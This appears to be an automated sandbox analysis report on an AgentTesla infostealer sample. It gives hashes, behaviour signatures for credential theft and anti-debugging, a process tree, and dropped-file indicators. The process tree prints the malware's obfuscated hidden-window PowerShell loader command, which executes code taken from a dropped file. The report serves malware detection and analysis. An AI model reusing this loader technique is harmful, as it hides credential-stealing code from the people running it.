Analysis

  • max time kernel
    144s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/10/2024, 01:26

General

  • Target

    964b626022ea083fe9624f88d0371fa01fb6b3b4fa081e880d88a05bbf0654b3.exe

  • Size

    666KB

  • MD5

    0cc41f127fab597085bc6125dfc809f2

  • SHA1

    1e36ce6c9d40f959628739b740e4e30cd4afa0b7

  • SHA256

    964b626022ea083fe9624f88d0371fa01fb6b3b4fa081e880d88a05bbf0654b3

  • SHA512

    2482ec6a288163d8fd55abced05ba885c65f88fc5b5de8bc81a987bd25dd855de2f22428125f264dec9a6ab3ffb7d8b55339147c68642a1bac6c37832e1a7e15

  • SSDEEP

    12288:ONBi378Ezq6mFhbL5RGDuLHsomyplHD1YE5c9dJmsOZAjGQB7F0PgvD5Fb7E:ONg37Hq6iNLGsHcejj5c96ZOGQMPgNpE

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Loads dropped DLL 2 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\964b626022ea083fe9624f88d0371fa01fb6b3b4fa081e880d88a05bbf0654b3.exe
    "C:\Users\Admin\AppData\Local\Temp\964b626022ea083fe9624f88d0371fa01fb6b3b4fa081e880d88a05bbf0654b3.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1896
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Witnesseth=Get-Content -raw 'C:\Users\Admin\AppData\Local\Skaberkrfters\Klembt\indgivelsers\Haarvksten\Nomenklaturerne.Bac';$Pinkwort=$Witnesseth.SubString(54335,3);.$Pinkwort($Witnesseth)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:220
      • C:\Users\Admin\AppData\Local\Temp\Forskelsbehandlende.exe
        "C:\Users\Admin\AppData\Local\Temp\Forskelsbehandlende.exe"
        3⤵
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        PID:5116
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Witnesseth=Get-Content -raw 'C:\Users\Admin\AppData\Local\Skaberkrfters\Klembt\indgivelsers\Haarvksten\Nomenklaturerne.Bac';$Pinkwort=$Witnesseth.SubString(54335,3);.$Pinkwort($Witnesseth)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:536
      • C:\Users\Admin\AppData\Local\Temp\Forskelsbehandlende.exe
        "C:\Users\Admin\AppData\Local\Temp\Forskelsbehandlende.exe"
        3⤵
        • Loads dropped DLL
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4640

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199

    Filesize

    854B

    MD5

    e935bc5762068caf3e24a2683b1b8a88

    SHA1

    82b70eb774c0756837fe8d7acbfeec05ecbf5463

    SHA256

    a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d

    SHA512

    bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    1KB

    MD5

    637dde667e8c09040c9cb4fc14298361

    SHA1

    d4490679974d9b291ec0bd8e16b80e5a2931876b

    SHA256

    b550811d4bab68823c7a9083a0e5b48f0ecb3152c721b252f656e0ac41d6a192

    SHA512

    4ff62e05f8df63ea05775e18531f42ec0a99407c6cadd87eab1322d248023ccd536715fb87ff2095c84b00fe8dc9ccc37f30eb10a05aa1c9c6b14b84b78d2fc7

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6DA548C7E5915679F87E910D6581DEF1_831B21EC05D416A4ADB2370CD79ABCDD

    Filesize

    471B

    MD5

    44bd7788636834199734c4641de38443

    SHA1

    3884ce3fff582e1c0b63cf0da8f1de0da5f71902

    SHA256

    2fd9882432710b0bcde151bbace2b764fbc71531f5f2890fa228394f834d9637

    SHA512

    52106319011c2c0683074e5d3d150d1c6d20033d0842657f50fae810821576786f57b508a4e4e35f04448db83c809af36d4171e50b12764a494fe43fd4e2b5e3

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_CFDBFDB29AA6A71EBDC3E04CD6E276F4

    Filesize

    472B

    MD5

    90cfbca46c0f7a3eb1d646b5306d0746

    SHA1

    1b3a3d25cfbadf2ec2668cefd7fc18ec621f4c2c

    SHA256

    b7f9b0e7966a88533d471a7fc3f0dfe7122e7fa05b82d91232e4b738248c3ea3

    SHA512

    a749878454ed00b126126e0334ff05b457a43894143741a0bcf7aa402a3c68f5d5c0e206208cfc579ebce4f57be932c135424529fc91db9a6164fc9bd8a86f10

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199

    Filesize

    170B

    MD5

    6f3d0ec4f494a0a09d806f52bf0044f6

    SHA1

    429b79ad354dc3ee104ad247603f138c21174737

    SHA256

    9be066415f7e235407634ddf433e2d6c0ff5686134c52831d39a54eb04772cad

    SHA512

    d2b05c9b6259370cec770fdb340c74c1c130aa02163ec757bf644925db926dd59eed1d709b3d1f8d7a3af2d6fa1067a654e6ad233bdd7155af3a7309955bd64a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    410B

    MD5

    7dee3b7862f2789e5543fe29f6066919

    SHA1

    cd742325dc7feba7ad1f67b5dcf24136662e04c6

    SHA256

    78990e925e9b71b1589a9d9b88e31532629b335a0996d1ac725ab073e94a3aa5

    SHA512

    0f3a44e6160eb497e492b8dd339932e41dc96f1c77f8680ce160dc572b72fc5b1aaf48b4a08fbf37ed02cd58a9dafe1f75456c188406ad62c092a2e68cbf05ab

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6DA548C7E5915679F87E910D6581DEF1_831B21EC05D416A4ADB2370CD79ABCDD

    Filesize

    402B

    MD5

    fdee58539809c7459f6555db3efc55bc

    SHA1

    16d8127169073e2d8f5aa3551e57c3585e14e53e

    SHA256

    756ababbb122b9858b6a891ad31fb8d5ecb881f83aac28ef1463fd18983a0fb9

    SHA512

    1692182c8116280c54134b00e5b1bcff257590753c2d9f12753edc610ef3f21bfb82e79ab5f832ab47e4bbe4ae2a16af94d8c85f7d4425148fbbf4283ac9acb7

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_CFDBFDB29AA6A71EBDC3E04CD6E276F4

    Filesize

    398B

    MD5

    5196a2d0eeaeeb0ae207351c31de8572

    SHA1

    e519b3dbefed375d6ed70db7be00812effa21737

    SHA256

    499fbe3734172c65187b7d658743dce99538e000f16cdfd5c004840d0d78bee9

    SHA512

    3e2ff847f3b4b5542930fdeecf677420e44026161b5ae30f03237f0b2aec920299fab141587c87e56f3078c2d38e87c845bb599c9d85562b111dd370b65bd986

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    01404e51f6442f60e478c306b1e6e52e

    SHA1

    37f234ccf5611b8309023410ceb9e76ad81f5678

    SHA256

    d4356dd23aa2e811712132f9718786331661a1bd0d062c49cb76807b9563928b

    SHA512

    94a9d843ae4055e2a9b412f03cba85e2d7b804ec3106f059d14ca50b15ae4acc6cd452f9461c2e21d1632d06848c969732c539aea17869b8b3a2f5ab93b891d7

  • C:\Users\Admin\AppData\Local\Skaberkrfters\Klembt\indgivelsers\Haarvksten\Nomenklaturerne.Bac

    Filesize

    53KB

    MD5

    67517d72ac10b11f81aa07fc2f994275

    SHA1

    71d255f09b46f34093786eec160120e6383b2f8c

    SHA256

    0af4117e1ded224818ab4c741022f2179af74cc0cf9fcc640efb73746baf4fe4

    SHA512

    1c1054233b654d8831c114b0f009a095a49c8805b13a2d756e5eedec477cddb2608ed0012b040a8736916e3226a5aebb4425eb6f3ee02e4338afe9816b923afe

  • C:\Users\Admin\AppData\Local\Skaberkrfters\Klembt\indgivelsers\Haarvksten\Quantitated.Bre

    Filesize

    342KB

    MD5

    5f9b9deef4ab85e8c6488e1c0f7c0166

    SHA1

    22ded843370b80440148b1f054cb02c209bb0335

    SHA256

    3641dbef493712c13358f8a92c87585995ed79e7bc449379c6d1b7915e55e735

    SHA512

    bd54694e3b8883b1d90eefd4dc1e42c8d2406269b27999c4199cb2cc70eb00b61ba9e41ef6782fa38719dd8bae17ca66731b8002714abceacc34068bc054f0b7

  • C:\Users\Admin\AppData\Local\Temp\Forskelsbehandlende.exe

    Filesize

    666KB

    MD5

    0cc41f127fab597085bc6125dfc809f2

    SHA1

    1e36ce6c9d40f959628739b740e4e30cd4afa0b7

    SHA256

    964b626022ea083fe9624f88d0371fa01fb6b3b4fa081e880d88a05bbf0654b3

    SHA512

    2482ec6a288163d8fd55abced05ba885c65f88fc5b5de8bc81a987bd25dd855de2f22428125f264dec9a6ab3ffb7d8b55339147c68642a1bac6c37832e1a7e15

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zqgta4wa.otw.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/220-71-0x0000000007700000-0x000000000770A000-memory.dmp

    Filesize

    40KB

  • memory/220-24-0x0000000006140000-0x000000000615E000-memory.dmp

    Filesize

    120KB

  • memory/220-38-0x00000000070F0000-0x0000000007186000-memory.dmp

    Filesize

    600KB

  • memory/220-40-0x00000000066B0000-0x00000000066D2000-memory.dmp

    Filesize

    136KB

  • memory/220-39-0x0000000006640000-0x000000000665A000-memory.dmp

    Filesize

    104KB

  • memory/220-41-0x0000000007790000-0x0000000007D34000-memory.dmp

    Filesize

    5.6MB

  • memory/220-7-0x0000000002B50000-0x0000000002B86000-memory.dmp

    Filesize

    216KB

  • memory/220-43-0x00000000083C0000-0x0000000008A3A000-memory.dmp

    Filesize

    6.5MB

  • memory/220-46-0x0000000070640000-0x0000000070994000-memory.dmp

    Filesize

    3.3MB

  • memory/220-57-0x0000000073C00000-0x00000000743B0000-memory.dmp

    Filesize

    7.7MB

  • memory/220-8-0x0000000073C00000-0x00000000743B0000-memory.dmp

    Filesize

    7.7MB

  • memory/220-58-0x00000000075F0000-0x0000000007693000-memory.dmp

    Filesize

    652KB

  • memory/220-56-0x00000000075C0000-0x00000000075DE000-memory.dmp

    Filesize

    120KB

  • memory/220-60-0x0000000073C00000-0x00000000743B0000-memory.dmp

    Filesize

    7.7MB

  • memory/220-9-0x0000000005240000-0x0000000005868000-memory.dmp

    Filesize

    6.2MB

  • memory/220-45-0x0000000070090000-0x00000000700DC000-memory.dmp

    Filesize

    304KB

  • memory/220-44-0x0000000007580000-0x00000000075B2000-memory.dmp

    Filesize

    200KB

  • memory/220-6-0x0000000073C0E000-0x0000000073C0F000-memory.dmp

    Filesize

    4KB

  • memory/220-10-0x0000000073C00000-0x00000000743B0000-memory.dmp

    Filesize

    7.7MB

  • memory/220-73-0x0000000073C00000-0x00000000743B0000-memory.dmp

    Filesize

    7.7MB

  • memory/220-75-0x0000000007740000-0x0000000007764000-memory.dmp

    Filesize

    144KB

  • memory/220-74-0x0000000004ED0000-0x0000000004EFA000-memory.dmp

    Filesize

    168KB

  • memory/220-11-0x00000000059A0000-0x00000000059C2000-memory.dmp

    Filesize

    136KB

  • memory/220-79-0x0000000073C0E000-0x0000000073C0F000-memory.dmp

    Filesize

    4KB

  • memory/220-80-0x0000000073C00000-0x00000000743B0000-memory.dmp

    Filesize

    7.7MB

  • memory/220-13-0x0000000005B00000-0x0000000005B66000-memory.dmp

    Filesize

    408KB

  • memory/220-82-0x0000000073C00000-0x00000000743B0000-memory.dmp

    Filesize

    7.7MB

  • memory/220-12-0x0000000005A90000-0x0000000005AF6000-memory.dmp

    Filesize

    408KB

  • memory/220-84-0x0000000008A40000-0x000000000BB9E000-memory.dmp

    Filesize

    49.4MB

  • memory/220-86-0x0000000073C00000-0x00000000743B0000-memory.dmp

    Filesize

    7.7MB

  • memory/220-87-0x0000000073C00000-0x00000000743B0000-memory.dmp

    Filesize

    7.7MB

  • memory/220-23-0x0000000005B70000-0x0000000005EC4000-memory.dmp

    Filesize

    3.3MB

  • memory/220-89-0x0000000073C00000-0x00000000743B0000-memory.dmp

    Filesize

    7.7MB

  • memory/220-25-0x0000000006170000-0x00000000061BC000-memory.dmp

    Filesize

    304KB

  • memory/220-98-0x0000000073C00000-0x00000000743B0000-memory.dmp

    Filesize

    7.7MB

  • memory/536-72-0x0000000073C00000-0x00000000743B0000-memory.dmp

    Filesize

    7.7MB

  • memory/536-61-0x0000000070640000-0x0000000070994000-memory.dmp

    Filesize

    3.3MB

  • memory/536-88-0x0000000073C00000-0x00000000743B0000-memory.dmp

    Filesize

    7.7MB

  • memory/536-83-0x0000000073C00000-0x00000000743B0000-memory.dmp

    Filesize

    7.7MB

  • memory/536-28-0x0000000073C00000-0x00000000743B0000-memory.dmp

    Filesize

    7.7MB

  • memory/536-26-0x0000000073C00000-0x00000000743B0000-memory.dmp

    Filesize

    7.7MB

  • memory/536-59-0x0000000070090000-0x00000000700DC000-memory.dmp

    Filesize

    304KB

  • memory/536-27-0x0000000073C00000-0x00000000743B0000-memory.dmp

    Filesize

    7.7MB

  • memory/536-96-0x0000000073C00000-0x00000000743B0000-memory.dmp

    Filesize

    7.7MB

  • memory/4640-127-0x0000000000480000-0x00000000016D4000-memory.dmp

    Filesize

    18.3MB

  • memory/4640-99-0x0000000000480000-0x00000000016D4000-memory.dmp

    Filesize

    18.3MB

  • memory/4640-130-0x0000000000480000-0x00000000004EC000-memory.dmp

    Filesize

    432KB

  • memory/4640-132-0x0000000023870000-0x00000000238C0000-memory.dmp

    Filesize

    320KB

  • memory/4640-133-0x00000000238C0000-0x0000000023952000-memory.dmp

    Filesize

    584KB

  • memory/4640-134-0x0000000023990000-0x000000002399A000-memory.dmp

    Filesize

    40KB